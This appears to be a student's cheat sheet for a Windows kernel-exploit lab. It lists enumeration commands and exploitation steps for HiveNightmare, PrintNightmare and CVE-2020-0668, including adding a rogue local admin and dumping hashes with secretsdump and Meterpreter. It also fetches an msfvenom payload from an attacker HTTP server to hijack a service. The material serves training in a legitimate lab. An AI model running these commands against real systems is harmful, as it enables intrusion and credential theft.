16.Kernel-exploits

Enumeration Commands

systeminfo
wmic qfe list brief
Get-Hotfix
icacls
whoami /priv
ls \\localhost\pipe\spoolss

Exploitation Commands

HiveNightmare.exe
impacket-secretsdump
Set-ExecutionPolicy Bypass -Scope Process
Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare -NewUser "hacker" -NewPassword "Pwnd1234!" -DriverName "PrintIt"
msfvenom
python3 -m http.server <port>
wget http://<ip>:<port>/<file>
CVE-2020-0668.exe <source> <destination>
copy /Y <source> <destination>
msfconsole -r <resource_file>
net start MozillaMaintenance

Verification Commands

net user hacker
getuid # (Meterpreter)
hashdump # (Meterpreter)

Key Concepts:

• Kernel Exploits:

  • Exploit vulnerabilities in the Windows kernel for privilege escalation.

  • Patching is crucial, but often incomplete.

• Historical Vulnerabilities:

  • MS08-067 (Server service RCE).

  • MS17-010 (EternalBlue, SMB RCE).

  • ALPC Task Scheduler 0-Day (Local privilege escalation).

  • CVE-2021-36934 (HiveNightmare, registry access).

  • CVE-2021-1675/CVE-2021-34527 (PrintNightmare, print spooler RCE).

  • CVE-2020-0668 (Service Tracing local privilege escalation).

• Patch Management:

  • Importance of keeping systems updated.

  • Older vulnerabilities remain relevant.

Approach, Commands, Tools, and Techniques:

1. Enumeration:

   • systeminfo, wmic qfe list brief, Get-Hotfix (Installed updates).

   • icacls (File permissions).

   • whoami /priv (User privileges).

   • ls \\localhost\pipe\spoolss (Spooler service check).

2. Exploitation:

   • HiveNightmare (CVE-2021-36934):

     • HiveNightmare.exe (Dump registry hives).

     • impacket-secretsdump (Extract hashes).

   • PrintNightmare (CVE-2021-1675/CVE-2021-34527):

     • Set-ExecutionPolicy Bypass -Scope Process (Bypass PowerShell execution policy).

     • Import-Module .\CVE-2021-1675.ps1 (Import PowerShell exploit).

     • Invoke-Nightmare -NewUser "hacker" -NewPassword "Pwnd1234!" -DriverName "PrintIt" (Add local admin).

   • CVE-2020-0668 (Service Tracing):

     • Build exploit in Visual Studio.

     • msfvenom (Generate malicious binary).

     • Python HTTP server, wget (Download binary).

     • CVE-2020-0668.exe (Run exploit).

     • copy (Replace service binary).

     • Metasploit resource script, msfconsole -r (Start listener).

     • net start MozillaMaintenance (Start service).

3. Verification:

   • net user hacker (Verify user creation).

   • getuid (Meterpreter, verify SYSTEM privileges).

   • hashdump (Meterpreter, dump password hashes).

Commands:

• systeminfo, wmic qfe list brief, Get-Hotfix, icacls, whoami /priv, ls, Set-ExecutionPolicy, Import-Module, Invoke-Nightmare, msfvenom, python3 -m http.server, wget, copy, msfconsole, net user, net start, getuid, hashdump, impacket-secretsdump.

Tools:

• HiveNightmare.exe, impacket, Metasploit, PowerShell scripts, custom exploits.

Task:

• RDP to the target.

• Exploit HiveNightmare, PrintNightmare, and CVE-2020-0668.

• Escalate privileges to NT AUTHORITY\SYSTEM.

• Retrieve the flag from the Administrator Desktop.